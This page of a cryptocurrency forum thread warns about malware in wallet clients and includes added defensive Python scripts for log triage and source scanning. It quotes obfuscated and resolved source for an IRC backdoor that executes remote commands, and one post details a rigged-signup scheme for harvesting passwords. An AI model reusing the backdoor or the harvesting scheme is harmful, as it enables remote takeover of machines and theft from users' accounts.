Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 43. (Read 834755 times)

hero member
Activity: 868
Merit: 503
the simplest malware is a website

I have never done it, but I have known people that have, and it is so simple and never catches a single eye

you download and install WordPress and set up a good strong blog, set up a free user-based subscription, and that is it

most computer/internet users have 1-5 email addresses, and two of those are used more than the rest

most users have three main passwords and two others

passwords vary by user based on the three common password-security configs: any number/letter combo of six keys or more; one that must have a letter and a number; and the last, which adds the special-character requirement

for example, depending on the website requirements, a normal user may have these three main passwords

password
password123
password123$

when they sign up for your blog, they are likely using their secondary/spam-catch email and one of those main passwords

when they signed up for a bank account, PayPal or another main service, they used their main email and one of those passwords

a WordPress site that requires a special character, number and text has just about gotten all three passwords by simply working backwards; don't spam the subscribers, and ask them for a second recovery email account after thirty days, and you will probably have the primary email; if not, that is a pretty easy find on the internet

no viruses, no Trojans or keyloggers, just human nature and the inability to remember too many damned passwords

I have known developers to take it one step further and modify the sign-up process: the signup would keep telling the person that the email was already in use, three times, and get three email addresses, and then the password setup script was modified to be a real pain and say no to the simple password, asking for a capital and a number, then after that password, add the special-character request, and boom, three main passwords and three email addresses; worst-case scenario, the person gets frustrated and leaves the site

too much of a pain for me and just sooooooo wrong, but one of our past IT guys did it over and over; the hardest part was actually developing a strong and good blog that made people want to sign up; with traffic at 500 plus per day, that means around 20 new signups each day; he collected them but never did anything, just as a case in point; after two years he had around 18,000 user profiles; he spot-checked more than fifty and was in their PayPal within three minutes, used that to see their bank accounts and was in those accounts in another three minutes, with about an 87% success rate

remember, when you sign up on a new site or app, you are giving that info to whoever made (or even copied) the site; I personally have both a spam email catcher and a full set of spam passwords that I use on new sites, plus my credit cards can all produce a virtual number from their site for use on unknown websites that will disappear after one use or a given amount of money spent; you almost need to be three people: the businessman, the social magnet, and then the guy who hands out info to any site that so much as looks interesting, lol
newbie
Activity: 1
Merit: 0
A very useful warning. People should be careful while using macros. I think people usually get attracted to using specific bots or these types of macros and get scammed.
sr. member
Activity: 412
Merit: 250
Yes... we should really be very attentive to malware infections. The last infection attempt I found was through an email. This email seemed to come from the Dropbox team, but it wasn't. If any of you received such an email you should delete it immediately.
newbie
Activity: 2
Merit: 0
Thanks, well that means I'm gonna use the .org installation then. Thanks for the info, groggin.
legendary
Activity: 1894
Merit: 1001

never had a problem w/litecoin.org, ya gotta watch that - congrats on killing it!
newbie
Activity: 2
Merit: 0
Good day guys, just wanna ask if there are other people in here that are facing the same issue that I have encountered. I just downloaded the litecoin wallet for Windows from litecoin.com, yes, it's litecoin.com not litecoin.org. And after I installed it on my PC, suddenly in the folder where I put the litecoin wallet installer 2 files were added, 1 is a batch file, the other is... well... I don't know what the heck the other file is.

So, after the installation was successful, I tried to delete the installation files, which... I can't, same ol' "being used by the system" warning excuse, while the installation process had finished. So I started the task manager, and found that there is one file that doesn't have an explanation of what file it is on the right panel, so... open file location, which leads to a folder named dclogs... curious... so I tried to open it and then wow... only a few minutes and it had already written down 3 of my browsing activities (I noticed from the creation date of the files inside the dclogs folder). Googled it... and I came to know that it was some kind of keylogger... hmmm... bummer, but I'm quite lucky...

My question is, is it even possible that the installation file from litecoin.com contains this keylogger? And I'm a bit hesitant to download from litecoin.org. Has this issue ever happened to someone in here? Are litecoin.com and litecoin.org in the same team? I would appreciate it if someone could give me (a newbie) some info on this matter, and thanks.
legendary
Activity: 1806
Merit: 1164
Well, BTC hardware wallet protection starts to be very complicated, because trojans and worms also are more developed. Only Linux can help, I think.

Just get a Trezor for your bitcoin. Your private keys will then be safe offline and Trezor works with Windows, Linux and OS X 10.8+

There are clever hacks for a trezor as well, nothing is 100% safe so don't get lulled into a false sense of security. See: http://www.hackinsight.org/news,303.html

Granted, that is a particular version of firmware, but as with any device that stores "money" there will always be people looking for the loopholes. A dedicated attacker only needs a small window of time to make your funds vanish.

Pretty old news. The hack that Jochen Hoenicke found for Trezor was disabled when Trezor started enforcing PINs on firmware 1.3.3. Using a Trezor with PIN and passphrase enabled is about as safe as it gets for storing your bitcoin.

There is malware that can steal bitcoin from password protected local wallets. Coinbitclip is one example and there are more.
newbie
Activity: 43
Merit: 0
Another pretty safe and easy to use program is Deep Freeze.
You can freeze your Windows partition and as soon as you reboot, your PC will go back to the state it was in when you "froze" it.
This way no viruses, keyloggers, trojans, RATs, etc. can infect you (as soon as you reboot, the bad stuff is gone).
The downside is that you will have to put the block-chain of any coins you use on the second partition of your hard drive (because you will not be able to update the wallet on the Windows partition).

+10 for Deep Freeze, thanks!! Check out SpyShelter also, good protection against keyloggers and such.
hero member
Activity: 1008
Merit: 1012
I have encountered such a problem in the past. I have since stopped using Bitcoin Core as a wallet and have not had a wallet that you need to download to your computer to use, since I find it annoying to have to download the blockchain every time you log into the program. Not to mention it eats up a lot of my bandwidth, which I seem to be running out of when the end of the month approaches.
member
Activity: 478
Merit: 66
Interesting... This is the reason why I don't dabble too much in AltCoins that seem fishy or have a very low/unknown value.
hero member
Activity: 952
Merit: 500
WARNING!! This client is making outbound connections to known malware and/or phishing sites.

http://www.urlquery.net/report.php?id=1434020970582

The "Recent reports on same IP/ASN/Domain" section shows other suspicious sites/links.
https://www.virustotal.com/en/url/946ac3207509fb493eaf2e02e107b97cc03513cb373bb007a8a61b9b6b0fe61c/analysis/1434120962/

Now let's see what the debug.log has to say...
Code:
2015-06-12 12:41:10 connection timeout
2015-06-12 12:41:11 trying connection 77.249.89.46:9748 lastseen=1802.3hrs
2015-06-12 12:41:16 connection timeout
2015-06-12 12:41:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:41:22 connection timeout
2015-06-12 12:41:22 trying connection 82.238.124.41:9748 lastseen=33.6hrs
2015-06-12 12:41:27 connection timeout
2015-06-12 12:41:28 trying connection 77.85.35.151:9748 lastseen=170.7hrs
2015-06-12 12:41:33 connection timeout
2015-06-12 12:41:33 trying connection 137.135.57.119:9748 lastseen=27.6hrs
2015-06-12 12:41:38 connection timeout
2015-06-12 12:41:39 trying connection 96.54.4.190:9748 lastseen=21.7hrs
2015-06-12 12:41:44 connection timeout
2015-06-12 12:41:44 trying connection 87.154.210.76:9748 lastseen=378.8hrs
2015-06-12 12:41:49 connection timeout
2015-06-12 12:41:50 trying connection 103.230.107.12:9748 lastseen=2166.3hrs
2015-06-12 12:41:55 connection timeout
2015-06-12 12:41:55 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:00 connection timeout
2015-06-12 12:42:01 trying connection 62.157.39.12:9748 lastseen=2675.3hrs
2015-06-12 12:42:06 connection timeout
2015-06-12 12:42:06 trying connection 71.100.135.84:9748 lastseen=16.9hrs
2015-06-12 12:42:11 connection timeout
2015-06-12 12:42:12 trying connection 162.255.117.105:9748 lastseen=52.5hrs
2015-06-12 12:42:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:22 connection timeout
2015-06-12 12:42:23 trying connection 71.100.135.84:9748 lastseen=16.9hrs
2015-06-12 12:42:28 connection timeout
2015-06-12 12:42:28 trying connection 5.139.143.81:9748 lastseen=3461.6hrs
2015-06-12 12:42:33 connection timeout
2015-06-12 12:42:34 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:39 connection timeout
2015-06-12 12:42:39 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:44 connection timeout
2015-06-12 12:42:45 trying connection 87.154.214.25:9748 lastseen=2063.7hrs
2015-06-12 12:42:50 connection timeout
************************************************************
2015-06-12 12:42:50 trying connection 104.219.250.234:9748 lastseen=7.2hrs**
************************************************************
2015-06-12 12:42:55 connection timeout
2015-06-12 12:42:56 trying connection 80.57.229.215:9748 lastseen=115.2hrs
2015-06-12 12:43:01 connection timeout
2015-06-12 12:43:01 trying connection 77.232.5.253:9748 lastseen=1191.0hrs

Report for the address 104.xxx.xxx.234:
http://www.urlquery.net/report.php?id=1434121818636

And one of its suspicious links/sites:
https://www.virustotal.com/en/url/3b1a7af045bdc8005e8243f65d203df04ba8d43f9e10fd39af1004aad75da0ed/analysis/1434122387/

Then from this screenshot it looks like Geocoin (and then all its clones) has malicious code in it... or am I wrong?
What can we do to inspect the source of coins looking for malicious code and prevent this kind of thing?
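One way to triage a debug.log like the one above without relying only on a reputation site: parse the "trying connection" lines, count attempts per peer, and flag any address the client keeps returning to far more often than the rest, or that is on a blocklist. This is an added example, not code from the original post or from any wallet project; the log excerpt is constructed in the same format as the post's lines, and the blocklist is a stand-in for the urlquery/VirusTotal verdicts linked above.

```python
import re
import statistics
from collections import Counter

# Constructed excerpt in the debug.log format quoted above (same IPs/port as the post).
SAMPLE_LOG = """\
2015-06-12 12:41:11 trying connection 77.249.89.46:9748 lastseen=1802.3hrs
2015-06-12 12:41:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:41:55 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:34 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:39 connection timeout
2015-06-12 12:42:39 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:45 trying connection 87.154.214.25:9748 lastseen=2063.7hrs
"""

# Stand-in (constructed) for the malicious verdicts the post links to.
BLOCKLIST = {"104.219.250.234"}

ATTEMPT_RE = re.compile(
    r"^(\S+ \S+) trying connection (\d+\.\d+\.\d+\.\d+):(\d+) lastseen=([\d.]+)hrs$"
)

def parse_attempts(text):
    """Return (timestamp, ip, port, lastseen_hours) for every 'trying connection' line."""
    out = []
    for line in text.splitlines():
        m = ATTEMPT_RE.match(line.strip())
        if m:
            out.append((m.group(1), m.group(2), int(m.group(3)), float(m.group(4))))
    return out

def triage(text, blocklist=BLOCKLIST, retry_factor=3):
    """Flag peers that are blocklisted or retried far more often than the median peer."""
    counts = Counter(ip for _, ip, _, _ in parse_attempts(text))
    typical = statistics.median(counts.values()) if counts else 0
    findings = {}
    for ip, n in counts.items():
        reasons = []
        if ip in blocklist:
            reasons.append("listed as malicious")
        if n > 1 and n >= retry_factor * typical:   # hard-coded C2-like behaviour
            reasons.append(f"retried {n}x (median peer {typical:.0f}x)")
        if reasons:
            findings[ip] = reasons
    return findings
```

A peer that is retried every few seconds while every other address is tried once, as the boxed line in the post shows, is the pattern to look for even when no blocklist entry exists yet.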
legendary
Activity: 1624
Merit: 1001
But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?

Apparently not Cryptsy. They lost 13,000 BTC and 300,000 LTC because of the Lucky7Coin trojan.

What you see there is a red herring.
https://en.wikipedia.org/wiki/Red_herring

https://bitcointalksearch.org/topic/m.13729914
copper member
Activity: 2856
Merit: 3071
There was apparently a coin that had a malicious virus in its client software.
It was AvatarCoin, and the wallet tried to duplicate the .dat wallet files onto the scammer's server so that he could take all of the coins from those wallets and sell them.

The AvatarCoin scam even included an avatar campaign of 8000AV to every user who joined the campaign, and stopped paying around January 8th.
full member
Activity: 224
Merit: 100
But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?

Apparently not Cryptsy. They lost 13,000 BTC and 300,000 LTC because of the Lucky7Coin trojan.
legendary
Activity: 2940
Merit: 1333
And this is what allegedly brings down Cryptsy...

In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

[...]

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?
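The backdoor above hides `popen` behind innocuous-looking macros (`CRead`, `CFree`, `CBuff`), which is exactly why a grep for `popen` or `system` misses it and why the earlier question "what can we do to inspect the source of coins" matters. The added example below, which is not code from the original thread or from any coin project, resolves object-like `#define` alias chains down to process-spawning functions and reports every call site; the C++ sample it scans is constructed to mirror the quoted snippet.

```python
import re
# Functions that hand a string to a shell or spawn a process (extend for your platform).
DANGEROUS = {"popen", "_popen", "system", "execl", "execv", "execve", "execvp", "WinExec", "ShellExecuteA"}

# Object-like alias macros such as `#define CRead popen`; `#define CBuff "PRIVMSG"` is skipped.
DEFINE_RE = re.compile(r"^\s*#\s*define\s+(\w+)\s+(\w+)\s*$")

def find_aliases(source):
    """Map every macro name that ultimately expands to a dangerous function."""
    direct = {}
    for line in source.splitlines():
        m = DEFINE_RE.match(line)
        if m:
            direct[m.group(1)] = m.group(2)
    aliases = {}
    for name in direct:
        cur, seen = name, set()
        while cur in direct and cur not in seen:   # follow #define chains, stop on cycles
            seen.add(cur)
            cur = direct[cur]
        if cur in DANGEROUS:
            aliases[name] = cur
    return aliases

def scan(source):
    """Return (line_no, name_as_written, real_function) for each suspicious call site."""
    aliases = find_aliases(source)
    names = sorted(DANGEROUS | set(aliases), key=len, reverse=True)
    call_re = re.compile(r"\b(" + "|".join(map(re.escape, names)) + r")\s*\(")
    hits = []
    for no, line in enumerate(source.splitlines(), 1):
        if DEFINE_RE.match(line):
            continue   # the alias definition shows up through its call sites
        for m in call_re.finditer(line):
            hits.append((no, m.group(1), aliases.get(m.group(1), m.group(1))))
    return hits

# Constructed sample modelled on the backdoor quoted above.
SAMPLE = """\
#define CBuff "PRIVMSG"
#define CLine FILE
#define CRead popen
#define CFree pclose
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) CFree(buf);
}
"""
```

This catches the alias trick but not function-like macros, inline wrappers, or calls reached through function pointers, so treat a clean result as a reason to keep reading, not as a verdict.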
legendary
Activity: 1330
Merit: 1000
And this is what allegedly brings down Cryptsy...
legendary
Activity: 1064
Merit: 1000
Well, BTC hardware wallet protection starts to be very complicated, because trojans and worms also are more developed. Only Linux can help, I think.

Just get a Trezor for your bitcoin. Your private keys will then be safe offline and Trezor works with Windows, Linux and OS X 10.8+

There are clever hacks for a trezor as well, nothing is 100% safe so don't get lulled into a false sense of security. See: http://www.hackinsight.org/news,303.html

Granted, that is a particular version of firmware, but as with any device that stores "money" there will always be people looking for the loopholes. A dedicated attacker only needs a small window of time to make your funds vanish.
legendary
Activity: 1008
Merit: 1000
I found this today. The post has since been removed, but I managed to screenshot it beforehand and also left negative feedback. A link to the VirusTotal results is included in the feedback.

It wasn't especially sophisticated, nor was it crypted, just basic wallet-stealing code that scans the PC for private keys. Seems to be targeted at noobs that would get greedy and download without thinking.

Off topic slightly, but you don't happen to know the name of a program I can use that will scan all my hard disk drives for wallets, do you? Would be handy if it also finds Dash wallets, because I've got at least 1 wallet on my HDD somewhere that I've completely lost.
legendary
Activity: 1806
Merit: 1164
Well, BTC hardware wallet protection starts to be very complicated, because trojans and worms also are more developed. Only Linux can help, I think.

Just get a Trezor for your bitcoin. Your private keys will then be safe offline and Trezor works with Windows, Linux and OS X 10.8+
legendary
Activity: 1064
Merit: 1000
I found this today. The post has since been removed, but I managed to screenshot it beforehand and also left negative feedback. A link to the VirusTotal results is included in the feedback.

It wasn't especially sophisticated, nor was it crypted, just basic wallet-stealing code that scans the PC for private keys. Seems to be targeted at noobs that would get greedy and download without thinking.